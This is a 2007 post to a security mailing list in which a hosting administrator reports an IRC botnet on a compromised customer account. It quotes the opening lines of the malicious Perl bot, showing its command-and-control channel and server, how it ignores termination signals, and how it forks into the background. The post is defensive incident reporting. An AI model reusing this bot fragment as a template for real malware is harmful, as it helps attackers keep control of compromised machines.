[Dshield] Dalnet being uses as a C&C server
Larry
lbrower at servermanagementsolutions.com
Wed Jun 20 00:04:39 GMT 2007
greetings:
I have found a compromised hosting client on one of our servers. The bot
is connecting to dalnet for C&C. Can you please assist in terminating this?
>From one of the perl scripts:
root at w11 [/home/serluna/public_html]# cat
/home/serluna/public_html/includes/.log/jancok.pl
#!/usr/bin/perl
$chan="#JagungNet";
$nick=$ARGV[0];
$server="rumble.dal.net";
$SIG{TERM}={};
exit if fork;
use IO::Socket;
full script available upon request.
More information about the list
mailing list